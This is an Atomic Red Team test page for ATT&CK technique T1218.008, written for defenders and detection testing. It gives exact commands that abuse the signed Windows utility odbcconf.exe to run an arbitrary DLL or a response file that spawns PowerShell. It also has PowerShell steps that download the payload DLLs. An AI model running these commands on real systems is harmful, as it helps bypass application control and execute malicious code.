Skip to content
Atomic Red Team
atomics
T1218.008

T1218.008 - Signed Binary Proxy Execution: Odbcconf

Description from ATT&CK (opens in a new tab)

Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.

Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32 (opens in a new tab), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)

Atomic Tests


Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL

Execute arbitrary DLL file stored locally.

Supported Platforms: Windows

auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2

Inputs:

NameDescriptionTypeDefault Value
dll_payloadDLL to executepathPathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll

Attack Commands: Run with command_prompt!

odbcconf.exe /S /A {REGSVR "#{dll_payload}"}

Dependencies: Run with powershell!

Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"


Atomic Test #2 - Odbcconf.exe - Load Response File

Execute arbitrary response file that will spawn PowerShell.exe. Source files: https://github.com/woanware/application-restriction-bypasses (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 331ce274-f9c9-440b-9f8c-a1006e1fce0b

Inputs:

NameDescriptionTypeDefault Value
rsp_file_nameResponse file name to loadstringT1218.008.rsp
rsp_file_pathResponse file pathstringPathToAtomicsFolder\T1218.008\bin\

Attack Commands: Run with command_prompt!

cd "#{rsp_file_path}"
odbcconf.exe -f "#{rsp_file_name}"

Dependencies: Run with powershell!

Description: T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
Check Prereq Commands:
if (Test-Path "#{rsp_file_path}#{rsp_file_name}") {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"